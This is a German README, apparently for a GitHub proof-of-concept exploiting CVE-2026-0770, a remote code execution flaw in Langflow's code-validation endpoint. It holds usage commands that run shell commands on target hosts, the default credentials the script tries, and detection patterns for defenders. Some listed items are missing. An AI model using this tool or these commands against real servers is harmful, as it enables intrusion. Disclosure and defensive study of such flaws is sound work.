
Langflow Remote Code Execution (RCE) Proof-of-Concept
Remote-Code-Execution-Schwachstelle in Langflow
Diese Schwachstelle betrifft:
Langflow
CVE-2026-0770 ist eine Remote-Code-Execution-Schwachstelle (RCE) im:
/api/v1/validate/code
Endpunkt.
Wenn AUTO_LOGIN=true und Standard-Anmeldedaten aktiviert sind, können Angreifer:
Das Problem beruht auf unsicherer Python-Code-Auswertung während der Validierung.
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
Stellen Sie sicher, dass Python 3.8+ installiert ist.
Abhängigkeiten installieren:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
Interaktive Remote-Befehlsausführung starten:
python3 CVE-2026-0770.py -t http://target:7860
Beispiel:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
Beispiel:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
Zeigt detaillierte Debug-Ausgaben.
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
Wenn kein Token angegeben wird, versucht das Skript einen Auto-Login mit:
username: langflow
password: langflow
Bei Erfolg ruft es ein access_token ab und fährt fort.
Administratoren sollten:
AUTO_LOGIN deaktivieren/api/v1/validate/code einschränkenÜberwachen auf:
Verdächtige POST-Anfragen an /api/v1/validate/code
Code, der Folgendes enthält:
__import__subprocessthrow(Exception(Wiederholte Anmeldeversuche mit Standard-Anmeldedaten
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
Sicherheitsforscher | Exploit-Entwickler | PoC-Autor
Verteilt unter der MIT-Lizenz. Die vollständige Lizenz finden Sie hier:
Dieses Projekt ist bestimmt für:
Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testberechtigung haben, ist illegal.